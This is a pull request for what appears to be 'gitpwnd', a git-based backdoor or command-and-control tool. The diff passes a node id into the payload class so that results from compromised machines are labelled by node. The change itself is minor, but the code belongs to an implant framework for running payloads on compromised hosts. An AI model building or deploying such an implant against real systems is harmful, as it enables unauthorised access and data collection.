### PR TITLE
Use the right node_id while reporting

### DIFF
--- a/gitpwnd/agent.py.template
+++ b/gitpwnd/agent.py.template
@@ -66,7 +66,7 @@ def run_payload(repo_dir):
     # the backdoored repo isn't on our path so load it's source directly so we can use it
     payload_module = imp.load_source('payload', os.path.join(repo_dir, 'payload.py'))
 
-    payload = payload_module.Payload()
+    payload = payload_module.Payload(NODE_ID)
     payload.run()
     payload.save_results()
     return payload

--- a/gitpwnd/payload.py.template
+++ b/gitpwnd/payload.py.template
@@ -12,8 +12,9 @@ class Payload:
     ## Core required functions ##
     #############################
 
-    def __init__(self):
+    def __init__(self, node_id):
         self.results = {}
+        self.node_id = node_id
 
     # This is the main() method that's called by compromised machines
     # Gather info/run commands and store the results in self.results
@@ -116,4 +117,4 @@ class Payload:
         return str(datetime.datetime.now())
 
     def get_node_id(self):
-        return str(uuid.uuid4())
+        return self.node_id


### PR DESCRIPTION
Currently, `payload.py` writes a random `uuid.uuid4()` value into `results.json`. This fix allows it to write in the node id for the node it's running on.